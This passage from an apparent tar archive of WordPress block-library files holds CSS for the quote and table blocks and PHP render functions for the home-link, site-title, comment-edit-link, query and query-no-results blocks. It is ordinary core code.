  padding-right:0;
}
.wp-block-quote.is-large,.wp-block-quote.is-style-large,.wp-block-quote.is-style-plain{
  border:none;
}quote/style.min.css000060400000001273151330427370010341 0ustar00.wp-block-quote{box-sizing:border-box;overflow-wrap:break-word}.wp-block-quote.is-large:where(:not(.is-style-plain)),.wp-block-quote.is-style-large:where(:not(.is-style-plain)){margin-bottom:1em;padding:0 1em}.wp-block-quote.is-large:where(:not(.is-style-plain)) p,.wp-block-quote.is-style-large:where(:not(.is-style-plain)) p{font-size:1.5em;font-style:italic;line-height:1.6}.wp-block-quote.is-large:where(:not(.is-style-plain)) cite,.wp-block-quote.is-large:where(:not(.is-style-plain)) footer,.wp-block-quote.is-style-large:where(:not(.is-style-plain)) cite,.wp-block-quote.is-style-large:where(:not(.is-style-plain)) footer{font-size:1.125em;text-align:right}.wp-block-quote>cite{display:block}quote/theme.min.css000060400000000724151330427370010303 0ustar00.wp-block-quote{border-left:.25em solid;margin:0 0 1.75em;padding-left:1em}.wp-block-quote cite,.wp-block-quote footer{color:currentColor;font-size:.8125em;font-style:normal;position:relative}.wp-block-quote.has-text-align-right{border-left:none;border-right:.25em solid;padding-left:0;padding-right:1em}.wp-block-quote.has-text-align-center{border:none;padding-left:0}.wp-block-quote.is-large,.wp-block-quote.is-style-large,.wp-block-quote.is-style-plain{border:none}quote/theme-rtl.min.css000060400000000727151330427370011105 0ustar00.wp-block-quote{border-right:.25em solid;margin:0 0 1.75em;padding-right:1em}.wp-block-quote cite,.wp-block-quote footer{color:currentColor;font-size:.8125em;font-style:normal;position:relative}.wp-block-quote.has-text-align-right{border-left:.25em solid;border-right:none;padding-left:1em;padding-right:0}.wp-block-quote.has-text-align-center{border:none;padding-right:0}.wp-block-quote.is-large,.wp-block-quote.is-style-large,.wp-block-quote.is-style-plain{border:none}quote/style.css000060400000001347151330427370007561 0ustar00.wp-block-quote{
  box-sizing:border-box;
  overflow-wrap:break-word;
}
.wp-block-quote.is-large:where(:not(.is-style-plain)),.wp-block-quote.is-style-large:where(:not(.is-style-plain)){
  margin-bottom:1em;
  padding:0 1em;
}
.wp-block-quote.is-large:where(:not(.is-style-plain)) p,.wp-block-quote.is-style-large:where(:not(.is-style-plain)) p{
  font-size:1.5em;
  font-style:italic;
  line-height:1.6;
}
.wp-block-quote.is-large:where(:not(.is-style-plain)) cite,.wp-block-quote.is-large:where(:not(.is-style-plain)) footer,.wp-block-quote.is-style-large:where(:not(.is-style-plain)) cite,.wp-block-quote.is-style-large:where(:not(.is-style-plain)) footer{
  font-size:1.125em;
  text-align:right;
}
.wp-block-quote>cite{
  display:block;
}quote/style-rtl.css000060400000001346151330427370010357 0ustar00.wp-block-quote{
  box-sizing:border-box;
  overflow-wrap:break-word;
}
.wp-block-quote.is-large:where(:not(.is-style-plain)),.wp-block-quote.is-style-large:where(:not(.is-style-plain)){
  margin-bottom:1em;
  padding:0 1em;
}
.wp-block-quote.is-large:where(:not(.is-style-plain)) p,.wp-block-quote.is-style-large:where(:not(.is-style-plain)) p{
  font-size:1.5em;
  font-style:italic;
  line-height:1.6;
}
.wp-block-quote.is-large:where(:not(.is-style-plain)) cite,.wp-block-quote.is-large:where(:not(.is-style-plain)) footer,.wp-block-quote.is-style-large:where(:not(.is-style-plain)) cite,.wp-block-quote.is-style-large:where(:not(.is-style-plain)) footer{
  font-size:1.125em;
  text-align:left;
}
.wp-block-quote>cite{
  display:block;
}quote/theme.css000060400000001014151330427370007512 0ustar00.wp-block-quote{
  border-left:.25em solid;
  margin:0 0 1.75em;
  padding-left:1em;
}
.wp-block-quote cite,.wp-block-quote footer{
  color:currentColor;
  font-size:.8125em;
  font-style:normal;
  position:relative;
}
.wp-block-quote.has-text-align-right{
  border-left:none;
  border-right:.25em solid;
  padding-left:0;
  padding-right:1em;
}
.wp-block-quote.has-text-align-center{
  border:none;
  padding-left:0;
}
.wp-block-quote.is-large,.wp-block-quote.is-style-large,.wp-block-quote.is-style-plain{
  border:none;
}home-link.php000060400000013145151330427370007145 0ustar00<?php
/**
 * Server-side rendering of the `core/home-link` block.
 *
 * @package WordPress
 */

/**
 * Build an array with CSS classes and inline styles defining the colors
 * which will be applied to the home link markup in the front-end.
 *
 * @since 6.0.0
 *
 * @param  array $context home link block context.
 * @return array Colors CSS classes and inline styles.
 */
function block_core_home_link_build_css_colors( $context ) {
	$colors = array(
		'css_classes'   => array(),
		'inline_styles' => '',
	);

	// Text color.
	$has_named_text_color  = array_key_exists( 'textColor', $context );
	$has_custom_text_color = isset( $context['style']['color']['text'] );

	// If has text color.
	if ( $has_custom_text_color || $has_named_text_color ) {
		// Add has-text-color class.
		$colors['css_classes'][] = 'has-text-color';
	}

	if ( $has_named_text_color ) {
		// Add the color class.
		$colors['css_classes'][] = sprintf( 'has-%s-color', $context['textColor'] );
	} elseif ( $has_custom_text_color ) {
		// Add the custom color inline style.
		$colors['inline_styles'] .= sprintf( 'color: %s;', $context['style']['color']['text'] );
	}

	// Background color.
	$has_named_background_color  = array_key_exists( 'backgroundColor', $context );
	$has_custom_background_color = isset( $context['style']['color']['background'] );

	// If has background color.
	if ( $has_custom_background_color || $has_named_background_color ) {
		// Add has-background class.
		$colors['css_classes'][] = 'has-background';
	}

	if ( $has_named_background_color ) {
		// Add the background-color class.
		$colors['css_classes'][] = sprintf( 'has-%s-background-color', $context['backgroundColor'] );
	} elseif ( $has_custom_background_color ) {
		// Add the custom background-color inline style.
		$colors['inline_styles'] .= sprintf( 'background-color: %s;', $context['style']['color']['background'] );
	}

	return $colors;
}

/**
 * Build an array with CSS classes and inline styles defining the font sizes
 * which will be applied to the home link markup in the front-end.
 *
 * @since 6.0.0
 *
 * @param  array $context Home link block context.
 * @return array Font size CSS classes and inline styles.
 */
function block_core_home_link_build_css_font_sizes( $context ) {
	// CSS classes.
	$font_sizes = array(
		'css_classes'   => array(),
		'inline_styles' => '',
	);

	$has_named_font_size  = array_key_exists( 'fontSize', $context );
	$has_custom_font_size = isset( $context['style']['typography']['fontSize'] );

	if ( $has_named_font_size ) {
		// Add the font size class.
		$font_sizes['css_classes'][] = sprintf( 'has-%s-font-size', $context['fontSize'] );
	} elseif ( $has_custom_font_size ) {
		// Add the custom font size inline style.
		$font_sizes['inline_styles'] = sprintf( 'font-size: %s;', $context['style']['typography']['fontSize'] );
	}

	return $font_sizes;
}

/**
 * Builds an array with classes and style for the li wrapper
 *
 * @since 6.0.0
 *
 * @param  array $context    Home link block context.
 * @return string The li wrapper attributes.
 */
function block_core_home_link_build_li_wrapper_attributes( $context ) {
	$colors          = block_core_home_link_build_css_colors( $context );
	$font_sizes      = block_core_home_link_build_css_font_sizes( $context );
	$classes         = array_merge(
		$colors['css_classes'],
		$font_sizes['css_classes']
	);
	$style_attribute = ( $colors['inline_styles'] . $font_sizes['inline_styles'] );
	$classes[]       = 'wp-block-navigation-item';

	if ( is_front_page() ) {
		$classes[] = 'current-menu-item';
	} elseif ( is_home() && ( (int) get_option( 'page_for_posts' ) !== get_queried_object_id() ) ) {
		// Edge case where the Reading settings has a posts page set but not a static homepage.
		$classes[] = 'current-menu-item';
	}

	$wrapper_attributes = get_block_wrapper_attributes(
		array(
			'class' => implode( ' ', $classes ),
			'style' => $style_attribute,
		)
	);

	return $wrapper_attributes;
}

/**
 * Renders the `core/home-link` block.
 *
 * @since 6.0.0
 *
 * @param array    $attributes The block attributes.
 * @param string   $content    The saved content.
 * @param WP_Block $block      The parsed block.
 *
 * @return string Returns the post content with the home url added.
 */
function render_block_core_home_link( $attributes, $content, $block ) {
	if ( empty( $attributes['label'] ) ) {
		// Using a fallback for the label attribute allows rendering the block even if no attributes have been set,
		// e.g. when using the block as a hooked block.
		// Note that the fallback value needs to be kept in sync with the one set in `edit.js` (upon first loading the block in the editor).
		$attributes['label'] = __( 'Home' );
	}
	$aria_current = '';

	if ( is_front_page() ) {
		$aria_current = ' aria-current="page"';
	} elseif ( is_home() && ( (int) get_option( 'page_for_posts' ) !== get_queried_object_id() ) ) {
		// Edge case where the Reading settings has a posts page set but not a static homepage.
		$aria_current = ' aria-current="page"';
	}

	return sprintf(
		'<li %1$s><a class="wp-block-home-link__content wp-block-navigation-item__content" href="%2$s" rel="home"%3$s>%4$s</a></li>',
		block_core_home_link_build_li_wrapper_attributes( $block->context ),
		esc_url( home_url() ),
		$aria_current,
		wp_kses_post( $attributes['label'] )
	);
}

/**
 * Register the home block
 *
 * @since 6.0.0
 *
 * @uses render_block_core_home_link()
 * @throws WP_Error An WP_Error exception parsing the block definition.
 */
function register_block_core_home_link() {
	register_block_type_from_metadata(
		__DIR__ . '/home-link',
		array(
			'render_callback' => 'render_block_core_home_link',
		)
	);
}
add_action( 'init', 'register_block_core_home_link' );
site-title.php000060400000003421151330427370007341 0ustar00<?php
/**
 * Server-side rendering of the `core/site-title` block.
 *
 * @package WordPress
 */

/**
 * Renders the `core/site-title` block on the server.
 *
 * @since 5.8.0
 *
 * @param array $attributes The block attributes.
 *
 * @return string The render.
 */
function render_block_core_site_title( $attributes ) {
	$site_title = get_bloginfo( 'name' );
	if ( ! $site_title ) {
		return;
	}

	$tag_name = 'h1';
	$classes  = empty( $attributes['textAlign'] ) ? '' : "has-text-align-{$attributes['textAlign']}";
	if ( isset( $attributes['style']['elements']['link']['color']['text'] ) ) {
		$classes .= ' has-link-color';
	}

	if ( isset( $attributes['level'] ) ) {
		$tag_name = 0 === $attributes['level'] ? 'p' : 'h' . (int) $attributes['level'];
	}

	if ( $attributes['isLink'] ) {
		$aria_current = is_home() || ( is_front_page() && 'page' === get_option( 'show_on_front' ) ) ? ' aria-current="page"' : '';
		$link_target  = ! empty( $attributes['linkTarget'] ) ? $attributes['linkTarget'] : '_self';

		$site_title = sprintf(
			'<a href="%1$s" target="%2$s" rel="home"%3$s>%4$s</a>',
			esc_url( home_url() ),
			esc_attr( $link_target ),
			$aria_current,
			esc_html( $site_title )
		);
	}
	$wrapper_attributes = get_block_wrapper_attributes( array( 'class' => trim( $classes ) ) );

	return sprintf(
		'<%1$s %2$s>%3$s</%1$s>',
		$tag_name,
		$wrapper_attributes,
		// already pre-escaped if it is a link.
		$attributes['isLink'] ? $site_title : esc_html( $site_title )
	);
}

/**
 * Registers the `core/site-title` block on the server.
 *
 * @since 5.8.0
 */
function register_block_core_site_title() {
	register_block_type_from_metadata(
		__DIR__ . '/site-title',
		array(
			'render_callback' => 'render_block_core_site_title',
		)
	);
}
add_action( 'init', 'register_block_core_site_title' );
comment-edit-link.php000060400000003261151330427370010600 0ustar00<?php
/**
 * Server-side rendering of the `core/comment-edit-link` block.
 *
 * @package WordPress
 */

/**
 * Renders the `core/comment-edit-link` block on the server.
 *
 * @since 6.0.0
 *
 * @param array    $attributes Block attributes.
 * @param string   $content    Block default content.
 * @param WP_Block $block      Block instance.
 *
 * @return string Return the post comment's date.
 */
function render_block_core_comment_edit_link( $attributes, $content, $block ) {
	if ( ! isset( $block->context['commentId'] ) || ! current_user_can( 'edit_comment', $block->context['commentId'] ) ) {
		return '';
	}

	$edit_comment_link = get_edit_comment_link( $block->context['commentId'] );

	$link_atts = '';

	if ( ! empty( $attributes['linkTarget'] ) ) {
		$link_atts .= sprintf( 'target="%s"', esc_attr( $attributes['linkTarget'] ) );
	}

	$classes = array();
	if ( isset( $attributes['textAlign'] ) ) {
		$classes[] = 'has-text-align-' . $attributes['textAlign'];
	}
	if ( isset( $attributes['style']['elements']['link']['color']['text'] ) ) {
		$classes[] = 'has-link-color';
	}

	$wrapper_attributes = get_block_wrapper_attributes( array( 'class' => implode( ' ', $classes ) ) );

	return sprintf(
		'<div %1$s><a href="%2$s" %3$s>%4$s</a></div>',
		$wrapper_attributes,
		esc_url( $edit_comment_link ),
		$link_atts,
		esc_html__( 'Edit' )
	);
}

/**
 * Registers the `core/comment-edit-link` block on the server.
 *
 * @since 6.0.0
 */
function register_block_core_comment_edit_link() {
	register_block_type_from_metadata(
		__DIR__ . '/comment-edit-link',
		array(
			'render_callback' => 'render_block_core_comment_edit_link',
		)
	);
}

add_action( 'init', 'register_block_core_comment_edit_link' );
query.php000060400000014250151330427370006425 0ustar00<?php
/**
 * Server-side rendering of the `core/query` block.
 *
 * @package WordPress
 */

/**
 * Modifies the static `core/query` block on the server.
 *
 * @since 6.4.0
 *
 * @param array    $attributes Block attributes.
 * @param string   $content    Block default content.
 * @param WP_Block $block      The block instance.
 *
 * @return string Returns the modified output of the query block.
 */
function render_block_core_query( $attributes, $content, $block ) {
	$is_interactive = isset( $attributes['enhancedPagination'] )
		&& true === $attributes['enhancedPagination']
		&& isset( $attributes['queryId'] );

	// Enqueue the script module and add the necessary directives if the block is
	// interactive.
	if ( $is_interactive ) {
		$suffix = wp_scripts_get_suffix();
		if ( defined( 'IS_GUTENBERG_PLUGIN' ) && IS_GUTENBERG_PLUGIN ) {
			$module_url = gutenberg_url( '/build/interactivity/query.min.js' );
		}

		wp_register_script_module(
			'@wordpress/block-library/query',
			isset( $module_url ) ? $module_url : includes_url( "blocks/query/view{$suffix}.js" ),
			array(
				array(
					'id'     => '@wordpress/interactivity',
					'import' => 'static',
				),
				array(
					'id'     => '@wordpress/interactivity-router',
					'import' => 'dynamic',
				),
			),
			defined( 'GUTENBERG_VERSION' ) ? GUTENBERG_VERSION : get_bloginfo( 'version' )
		);
		wp_enqueue_script_module( '@wordpress/block-library/query' );

		$p = new WP_HTML_Tag_Processor( $content );
		if ( $p->next_tag() ) {
			// Add the necessary directives.
			$p->set_attribute( 'data-wp-interactive', 'core/query' );
			$p->set_attribute( 'data-wp-router-region', 'query-' . $attributes['queryId'] );
			$p->set_attribute( 'data-wp-context', '{}' );
			$p->set_attribute( 'data-wp-key', $attributes['queryId'] );
			$content = $p->get_updated_html();
		}
	}

	// Add the styles to the block type if the block is interactive and remove
	// them if it's not.
	$style_asset = 'wp-block-query';
	if ( ! wp_style_is( $style_asset ) ) {
		$style_handles = $block->block_type->style_handles;
		// If the styles are not needed, and they are still in the `style_handles`, remove them.
		if ( ! $is_interactive && in_array( $style_asset, $style_handles, true ) ) {
			$block->block_type->style_handles = array_diff( $style_handles, array( $style_asset ) );
		}
		// If the styles are needed, but they were previously removed, add them again.
		if ( $is_interactive && ! in_array( $style_asset, $style_handles, true ) ) {
			$block->block_type->style_handles = array_merge( $style_handles, array( $style_asset ) );
		}
	}

	return $content;
}

/**
 * Registers the `core/query` block on the server.
 *
 * @since 5.8.0
 */
function register_block_core_query() {
	register_block_type_from_metadata(
		__DIR__ . '/query',
		array(
			'render_callback' => 'render_block_core_query',
		)
	);
}
add_action( 'init', 'register_block_core_query' );

/**
 * Traverse the tree of blocks looking for any plugin block (i.e., a block from
 * an installed plugin) inside a Query block with the enhanced pagination
 * enabled. If at least one is found, the enhanced pagination is effectively
 * disabled to prevent any potential incompatibilities.
 *
 * @since 6.4.0
 *
 * @param array $parsed_block The block being rendered.
 * @return string Returns the parsed block, unmodified.
 */
function block_core_query_disable_enhanced_pagination( $parsed_block ) {
	static $enhanced_query_stack   = array();
	static $dirty_enhanced_queries = array();
	static $render_query_callback  = null;

	$block_name              = $parsed_block['blockName'];
	$block_type              = WP_Block_Type_Registry::get_instance()->get_registered( $block_name );
	$has_enhanced_pagination = isset( $parsed_block['attrs']['enhancedPagination'] ) && true === $parsed_block['attrs']['enhancedPagination'] && isset( $parsed_block['attrs']['queryId'] );
	/*
	 * Client side navigation can be true in two states:
	 *  - supports.interactivity = true;
	 *  - supports.interactivity.clientNavigation = true;
	 */
	$supports_client_navigation = ( isset( $block_type->supports['interactivity']['clientNavigation'] ) && true === $block_type->supports['interactivity']['clientNavigation'] )
		|| ( isset( $block_type->supports['interactivity'] ) && true === $block_type->supports['interactivity'] );

	if ( 'core/query' === $block_name && $has_enhanced_pagination ) {
		$enhanced_query_stack[] = $parsed_block['attrs']['queryId'];

		if ( ! isset( $render_query_callback ) ) {
			/**
			 * Filter that disables the enhanced pagination feature during block
			 * rendering when a plugin block has been found inside. It does so
			 * by adding an attribute called `data-wp-navigation-disabled` which
			 * is later handled by the front-end logic.
			 *
			 * @param string   $content  The block content.
			 * @param array    $block    The full block, including name and attributes.
			 * @return string Returns the modified output of the query block.
			 */
			$render_query_callback = static function ( $content, $block ) use ( &$enhanced_query_stack, &$dirty_enhanced_queries, &$render_query_callback ) {
				$has_enhanced_pagination = isset( $block['attrs']['enhancedPagination'] ) && true === $block['attrs']['enhancedPagination'] && isset( $block['attrs']['queryId'] );

				if ( ! $has_enhanced_pagination ) {
					return $content;
				}

				if ( isset( $dirty_enhanced_queries[ $block['attrs']['queryId'] ] ) ) {
					// Disable navigation in the router store config.
					wp_interactivity_config( 'core/router', array( 'clientNavigationDisabled' => true ) );
					$dirty_enhanced_queries[ $block['attrs']['queryId'] ] = null;
				}

				array_pop( $enhanced_query_stack );

				if ( empty( $enhanced_query_stack ) ) {
					remove_filter( 'render_block_core/query', $render_query_callback );
					$render_query_callback = null;
				}

				return $content;
			};

			add_filter( 'render_block_core/query', $render_query_callback, 10, 2 );
		}
	} elseif (
		! empty( $enhanced_query_stack ) &&
		isset( $block_name ) &&
		( ! $supports_client_navigation )
	) {
		foreach ( $enhanced_query_stack as $query_id ) {
			$dirty_enhanced_queries[ $query_id ] = true;
		}
	}

	return $parsed_block;
}

add_filter( 'render_block_data', 'block_core_query_disable_enhanced_pagination', 10, 1 );
query-no-results.php000060400000003467151330427370010546 0ustar00<?php
/**
 * Server-side rendering of the `core/query-no-results` block.
 *
 * @package WordPress
 */

/**
 * Renders the `core/query-no-results` block on the server.
 *
 * @since 6.0.0
 *
 * @global WP_Query $wp_query WordPress Query object.
 *
 * @param array    $attributes Block attributes.
 * @param string   $content    Block default content.
 * @param WP_Block $block      Block instance.
 *
 * @return string Returns the wrapper for the no results block.
 */
function render_block_core_query_no_results( $attributes, $content, $block ) {
	if ( empty( trim( $content ) ) ) {
		return '';
	}

	$page_key = isset( $block->context['queryId'] ) ? 'query-' . $block->context['queryId'] . '-page' : 'query-page';
	$page     = empty( $_GET[ $page_key ] ) ? 1 : (int) $_GET[ $page_key ];

	// Override the custom query with the global query if needed.
	$use_global_query = ( isset( $block->context['query']['inherit'] ) && $block->context['query']['inherit'] );
	if ( $use_global_query ) {
		global $wp_query;
		$query = $wp_query;
	} else {
		$query_args = build_query_vars_from_query_block( $block, $page );
		$query      = new WP_Query( $query_args );
	}

	if ( $query->post_count > 0 ) {
		return '';
	}

	$classes            = ( isset( $attributes['style']['elements']['link']['color']['text'] ) ) ? 'has-link-color' : '';
	$wrapper_attributes = get_block_wrapper_attributes( array( 'class' => $classes ) );
	return sprintf(
		'<div %1$s>%2$s</div>',
		$wrapper_attributes,
		$content
	);
}

/**
 * Registers the `core/query-no-results` block on the server.
 *
 * @since 6.0.0
 */
function register_block_core_query_no_results() {
	register_block_type_from_metadata(
		__DIR__ . '/query-no-results',
		array(
			'render_callback' => 'render_block_core_query_no_results',
		)
	);
}
add_action( 'init', 'register_block_core_query_no_results' );
table/style-rtl.css000060400000007724151330427370010317 0ustar00.wp-block-table{
  overflow-x:auto;
}
.wp-block-table table{
  border-collapse:collapse;
  width:100%;
}
.wp-block-table thead{
  border-bottom:3px solid;
}
.wp-block-table tfoot{
  border-top:3px solid;
}
.wp-block-table td,.wp-block-table th{
  border:1px solid;
  padding:.5em;
}
.wp-block-table .has-fixed-layout{
  table-layout:fixed;
  width:100%;
}
.wp-block-table .has-fixed-layout td,.wp-block-table .has-fixed-layout th{
  word-break:break-word;
}
.wp-block-table.aligncenter,.wp-block-table.alignleft,.wp-block-table.alignright{
  display:table;
  width:auto;
}
.wp-block-table.aligncenter td,.wp-block-table.aligncenter th,.wp-block-table.alignleft td,.wp-block-table.alignleft th,.wp-block-table.alignright td,.wp-block-table.alignright th{
  word-break:break-word;
}
.wp-block-table .has-subtle-light-gray-background-color{
  background-color:#f3f4f5;
}
.wp-block-table .has-subtle-pale-green-background-color{
  background-color:#e9fbe5;
}
.wp-block-table .has-subtle-pale-blue-background-color{
  background-color:#e7f5fe;
}
.wp-block-table .has-subtle-pale-pink-background-color{
  background-color:#fcf0ef;
}
.wp-block-table.is-style-stripes{
  background-color:initial;
  border-bottom:1px solid #f0f0f0;
  border-collapse:inherit;
  border-spacing:0;
}
.wp-block-table.is-style-stripes tbody tr:nth-child(odd){
  background-color:#f0f0f0;
}
.wp-block-table.is-style-stripes.has-subtle-light-gray-background-color tbody tr:nth-child(odd){
  background-color:#f3f4f5;
}
.wp-block-table.is-style-stripes.has-subtle-pale-green-background-color tbody tr:nth-child(odd){
  background-color:#e9fbe5;
}
.wp-block-table.is-style-stripes.has-subtle-pale-blue-background-color tbody tr:nth-child(odd){
  background-color:#e7f5fe;
}
.wp-block-table.is-style-stripes.has-subtle-pale-pink-background-color tbody tr:nth-child(odd){
  background-color:#fcf0ef;
}
.wp-block-table.is-style-stripes td,.wp-block-table.is-style-stripes th{
  border-color:#0000;
}
.wp-block-table .has-border-color td,.wp-block-table .has-border-color th,.wp-block-table .has-border-color tr,.wp-block-table .has-border-color>*{
  border-color:inherit;
}
.wp-block-table table[style*=border-top-color] tr:first-child,.wp-block-table table[style*=border-top-color] tr:first-child td,.wp-block-table table[style*=border-top-color] tr:first-child th,.wp-block-table table[style*=border-top-color]>*,.wp-block-table table[style*=border-top-color]>* td,.wp-block-table table[style*=border-top-color]>* th{
  border-top-color:inherit;
}
.wp-block-table table[style*=border-top-color] tr:not(:first-child){
  border-top-color:initial;
}
.wp-block-table table[style*=border-right-color] td:last-child,.wp-block-table table[style*=border-right-color] th,.wp-block-table table[style*=border-right-color] tr,.wp-block-table table[style*=border-right-color]>*{
  border-left-color:inherit;
}
.wp-block-table table[style*=border-bottom-color] tr:last-child,.wp-block-table table[style*=border-bottom-color] tr:last-child td,.wp-block-table table[style*=border-bottom-color] tr:last-child th,.wp-block-table table[style*=border-bottom-color]>*,.wp-block-table table[style*=border-bottom-color]>* td,.wp-block-table table[style*=border-bottom-color]>* th{
  border-bottom-color:inherit;
}
.wp-block-table table[style*=border-bottom-color] tr:not(:last-child){
  border-bottom-color:initial;
}
.wp-block-table table[style*=border-left-color] td:first-child,.wp-block-table table[style*=border-left-color] th,.wp-block-table table[style*=border-left-color] tr,.wp-block-table table[style*=border-left-color]>*{
  border-right-color:inherit;
}
.wp-block-table table[style*=border-style] td,.wp-block-table table[style*=border-style] th,.wp-block-table table[style*=border-style] tr,.wp-block-table table[style*=border-style]>*{
  border-style:inherit;
}
.wp-block-table table[style*=border-width] td,.wp-block-table table[style*=border-width] th,.wp-block-table table[style*=border-width] tr,.wp-block-table table[style*=border-width]>*{
  border-style:inherit;
  border-width:inherit;
}table/style.css000060400000007724151330427370007520 0ustar00.wp-block-table{
  overflow-x:auto;
}
.wp-block-table table{
  border-collapse:collapse;
  width:100%;
}
.wp-block-table thead{
  border-bottom:3px solid;
}
.wp-block-table tfoot{
  border-top:3px solid;
}
.wp-block-table td,.wp-block-table th{
  border:1px solid;
  padding:.5em;
}
.wp-block-table .has-fixed-layout{
  table-layout:fixed;
  width:100%;
}
.wp-block-table .has-fixed-layout td,.wp-block-table .has-fixed-layout th{
  word-break:break-word;
}
.wp-block-table.aligncenter,.wp-block-table.alignleft,.wp-block-table.alignright{
  display:table;
  width:auto;
}
.wp-block-table.aligncenter td,.wp-block-table.aligncenter th,.wp-block-table.alignleft td,.wp-block-table.alignleft th,.wp-block-table.alignright td,.wp-block-table.alignright th{
  word-break:break-word;
}
.wp-block-table .has-subtle-light-gray-background-color{
  background-color:#f3f4f5;
}
.wp-block-table .has-subtle-pale-green-background-color{
  background-color:#e9fbe5;
}
.wp-block-table .has-subtle-pale-blue-background-color{
  background-color:#e7f5fe;
}
.wp-block-table .has-subtle-pale-pink-background-color{
  background-color:#fcf0ef;
}
.wp-block-table.is-style-stripes{
  background-color:initial;
  border-bottom:1px solid #f0f0f0;
  border-collapse:inherit;
  border-spacing:0;
}
.wp-block-table.is-style-stripes tbody tr:nth-child(odd){
  background-color:#f0f0f0;
}
.wp-block-table.is-style-stripes.has-subtle-light-gray-background-color tbody tr:nth-child(odd){
  background-color:#f3f4f5;
}
.wp-block-table.is-style-stripes.has-subtle-pale-green-background-color tbody tr:nth-child(odd){
  background-color:#e9fbe5;
}
.wp-block-table.is-style-stripes.has-subtle-pale-blue-background-color tbody tr:nth-child(odd){
  background-color:#e7f5fe;
}
.wp-block-table.is-style-stripes.has-subtle-pale-pink-background-color tbody tr:nth-child(odd){
  background-color:#fcf0ef;
}
.wp-block-table.is-style-stripes td,.wp-block-table.is-style-stripes th{
  border-color:#0000;
}
.wp-block-table .has-border-color td,.wp-block-table .has-border-color th,.wp-block-table .has-border-color tr,.wp-block-table .has-border-color>*{
  border-color:inherit;
}
.wp-block-table table[style*=border-top-color] tr:first-child,.wp-block-table table[style*=border-top-color] tr:first-child td,.wp-block-table table[style*=border-top-color] tr:first-child th,.wp-block-table table[style*=border-top-color]>*,.wp-block-table table[style*=border-top-color]>* td,.wp-block-table table[style*=border-top-color]>* th{
  border-top-color:inherit;
}
.wp-block-table table[style*=border-top-color] tr:not(:first-child){
  border-top-color:initial;
}
.wp-block-table table[style*=border-right-color] td:last-child,.wp-block-table table[style*=border-right-color] th,.wp-block-table table[style*=border-right-color] tr,.wp-block-table table[style*=border-right-color]>*{
  border-right-color:inherit;
}
.wp-block-table table[style*=border-bottom-color] tr:last-child,.wp-block-table table[style*=border-bottom-color] tr:last-child td,.wp-block-table table[style*=border-bottom-color] tr:last-child th,.wp-block-table table[style*=border-bottom-color]>*,.wp-block-table table[style*=border-bottom-color]>* td,.wp-block-table table[style*=border-bottom-color]>* th{
  border-bottom-color:inherit;
}
.wp-block-table table[style*=border-bottom-color] tr:not(:last-child){
  border-bottom-color:initial;
}
.wp-block-table table[style*=border-left-color] td:first-child,.wp-block-table table[style*=border-left-color] th,.wp-block-table table[style*=border-left-color] tr,.wp-block-table table[style*=border-left-color]>*{
  border-left-color:inherit;
}
.wp-block-table table[style*=border-style] td,.wp-block-table table[style*=border-style] th,.wp-block-table table[style*=border-style] tr,.wp-block-table table[style*=border-style]>*{
  border-style:inherit;
}
.wp-block-table table[style*=border-width] td,.wp-block-table table[style*=border-width] th,.wp-block-table table[style*=border-width] tr,.wp-block-table table[style*=border-width]>*{
  border-style:inherit;
  border-width:inherit;
}table/style-rtl.min.css000060400000007417151330427370011100 0ustar00.wp-block-table{overflow-x:auto}.wp-block-table table{border-collapse:collapse;width:100%}.wp-block-table thead{border-bottom:3px solid}.wp-block-table tfoot{border-top:3px solid}.wp-block-table td,.wp-block-table th{border:1px solid;padding:.5em}.wp-block-table .has-fixed-layout{table-layout:fixed;width:100%}.wp-block-table .has-fixed-layout td,.wp-block-table .has-fixed-layout th{word-break:break-word}.wp-block-table.aligncenter,.wp-block-table.alignleft,.wp-block-table.alignright{display:table;width:auto}.wp-block-table.aligncenter td,.wp-block-table.aligncenter th,.wp-block-table.alignleft td,.wp-block-table.alignleft th,.wp-block-table.alignright td,.wp-block-table.alignright th{word-break:break-word}.wp-block-table .has-subtle-light-gray-background-color{background-color:#f3f4f5}.wp-block-table .has-subtle-pale-green-background-color{background-color:#e9fbe5}.wp-block-table .has-subtle-pale-blue-background-color{background-color:#e7f5fe}.wp-block-table .has-subtle-pale-pink-background-color{background-color:#fcf0ef}.wp-block-table.is-style-stripes{background-color:initial;border-bottom:1px solid #f0f0f0;border-collapse:inherit;border-spacing:0}.wp-block-table.is-style-stripes tbody tr:nth-child(odd){background-color:#f0f0f0}.wp-block-table.is-style-stripes.has-subtle-light-gray-background-color tbody tr:nth-child(odd){background-color:#f3f4f5}.wp-block-table.is-style-stripes.has-subtle-pale-green-background-color tbody tr:nth-child(odd){background-color:#e9fbe5}.wp-block-table.is-style-stripes.has-subtle-pale-blue-background-color tbody tr:nth-child(odd){background-color:#e7f5fe}.wp-block-table.is-style-stripes.has-subtle-pale-pink-background-color tbody tr:nth-child(odd){background-color:#fcf0ef}.wp-block-table.is-style-stripes td,.wp-block-table.is-style-stripes th{border-color:#0000}.wp-block-table .has-border-color td,.wp-block-table .has-border-color th,.wp-block-table .has-border-color tr,.wp-block-table .has-border-color>*{border-color:inherit}.wp-block-table table[style*=border-top-color] tr:first-child,.wp-block-table table[style*=border-top-color] tr:first-child td,.wp-block-table table[style*=border-top-color] tr:first-child th,.wp-block-table table[style*=border-top-color]>*,.wp-block-table table[style*=border-top-color]>* td,.wp-block-table table[style*=border-top-color]>* th{border-top-color:inherit}.wp-block-table table[style*=border-top-color] tr:not(:first-child){border-top-color:initial}.wp-block-table table[style*=border-right-color] td:last-child,.wp-block-table table[style*=border-right-color] th,.wp-block-table table[style*=border-right-color] tr,.wp-block-table table[style*=border-right-color]>*{border-left-color:inherit}.wp-block-table table[style*=border-bottom-color] tr:last-child,.wp-block-table table[style*=border-bottom-color] tr:last-child td,.wp-block-table table[style*=border-bottom-color] tr:last-child th,.wp-block-table table[style*=border-bottom-color]>*,.wp-block-table table[style*=border-bottom-color]>* td,.wp-block-table table[style*=border-bottom-color]>* th{border-bottom-color:inherit}.wp-block-table table[style*=border-bottom-color] tr:not(:last-child){border-bottom-color:initial}.wp-block-table table[style*=border-left-color] td:first-child,.wp-block-table table[style*=border-left-color] th,.wp-block-table table[style*=border-left-color] tr,.wp-block-table table[style*=border-left-color]>*{border-right-color:inherit}.wp-block-table table[style*=border-style] td,.wp-block-table table[style*=border-style] th,.wp-block-table table[style*=border-style] tr,.wp-block-table table[style*=border-style]>*{border-style:inherit}.wp-block-table table[style*=border-width] td,.wp-block-table table[style*=border-width] th,.wp-block-table table[style*=border-width] tr,.wp-block-table table[style*=border-width]>*{border-style:inherit;border-width:inherit}table/editor.css000060400000003071151330427370007635 